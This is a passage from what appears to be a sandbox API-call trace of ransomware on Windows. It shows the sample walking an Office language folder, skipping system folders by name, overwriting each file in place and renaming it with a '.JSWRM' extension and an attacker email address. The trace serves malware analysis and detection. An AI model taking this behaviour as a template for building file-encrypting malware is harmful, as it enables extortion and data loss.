hHeap=0x1e0000) returned 1 [0115.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0115.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCHART.CHM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgchart.chm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCHART.CHM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgchart.chm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0115.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0115.653] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1cac944, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1cac944, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46d8311, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x10880, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ORGCHART.VSL", cAlternateFileName="")) returned 1 [0115.653] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2=".") returned 1 [0115.653] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="..") returned 1 [0115.653] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="...") returned 1 [0115.653] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="windows") returned -1 [0115.654] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="recovery") returned -1 [0115.654] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="perflogs") returned -1 [0115.654] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="documents and settings") returned 1 [0115.654] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="$RECYCLE.BIN") returned 1 [0115.654] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="system volume information") returned -1 [0115.654] lstrcmpiW (lpString1="ORGCHART.VSL", lpString2="msocache") returned 1 [0115.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0115.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.VSL", lpUsedDefaultChar=0x0) returned 12 [0115.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0115.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0115.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.VSL", lpUsedDefaultChar=0x0) returned 12 [0115.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0115.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0115.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0115.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCHART.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgchart.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.655] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=67712) returned 1 [0115.655] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10880) returned 0x24c1d0 [0115.656] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x10880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x10880, lpOverlapped=0x0) returned 1 [0115.723] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.723] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x10880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x10880, lpOverlapped=0x0) returned 1 [0115.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.724] CloseHandle (hObject=0x238) returned 1 [0115.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0115.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0115.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0115.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0115.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0115.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0115.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0115.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.725] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCHART.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgchart.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGCHART.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgchart.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0115.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0115.726] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44563cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb490, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ORGCINTL.DLL", cAlternateFileName="")) returned 1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2=".") returned 1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="..") returned 1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="...") returned 1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="windows") returned -1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="recovery") returned -1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="perflogs") returned -1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="documents and settings") returned 1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="system volume information") returned -1 [0115.726] lstrcmpiW (lpString1="ORGCINTL.DLL", lpString2="msocache") returned 1 [0115.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0115.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0115.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0115.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0115.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0115.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0115.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0115.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0115.727] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46d8311, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46d8311, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46d8311, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x44a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ORGPOS.VRD", cAlternateFileName="")) returned 1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2=".") returned 1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="..") returned 1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="...") returned 1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="windows") returned -1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="recovery") returned -1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="perflogs") returned -1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="documents and settings") returned 1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="$RECYCLE.BIN") returned 1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="system volume information") returned -1 [0115.727] lstrcmpiW (lpString1="ORGPOS.VRD", lpString2="msocache") returned 1 [0115.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0115.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGPOS.VRD", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGPOS.VRD", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGPOS.VRD", lpUsedDefaultChar=0x0) returned 10 [0115.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0115.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0115.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGPOS.VRD", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGPOS.VRD", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGPOS.VRD", lpUsedDefaultChar=0x0) returned 10 [0115.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0115.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0115.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0115.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0115.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGPOS.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgpos.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.728] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1098) returned 1 [0115.729] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x440) returned 0x230a00 [0115.729] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x440, lpOverlapped=0x0) returned 1 [0115.730] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.730] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x440, lpOverlapped=0x0) returned 1 [0115.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0115.730] CloseHandle (hObject=0x238) returned 1 [0115.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0115.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0115.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0115.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0115.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0115.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0115.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0115.731] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGPOS.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgpos.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGPOS.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgpos.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0115.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0115.732] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x388a139, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x388a139, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x388a139, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x13290, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ORGWIZ.VSL", cAlternateFileName="")) returned 1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2=".") returned 1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="..") returned 1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="...") returned 1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="windows") returned -1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="recovery") returned -1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="perflogs") returned -1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="documents and settings") returned 1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="$RECYCLE.BIN") returned 1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="system volume information") returned -1 [0115.732] lstrcmpiW (lpString1="ORGWIZ.VSL", lpString2="msocache") returned 1 [0115.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0115.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGWIZ.VSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGWIZ.VSL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGWIZ.VSL", lpUsedDefaultChar=0x0) returned 10 [0115.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0115.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0115.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGWIZ.VSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGWIZ.VSL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGWIZ.VSL", lpUsedDefaultChar=0x0) returned 10 [0115.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0115.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0115.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0115.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0115.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgwiz.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.734] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=78480) returned 1 [0115.734] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13290) returned 0x24c1d0 [0115.735] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x13290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x13290, lpOverlapped=0x0) returned 1 [0115.779] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.779] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x13290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x13290, lpOverlapped=0x0) returned 1 [0115.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.780] CloseHandle (hObject=0x238) returned 1 [0115.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 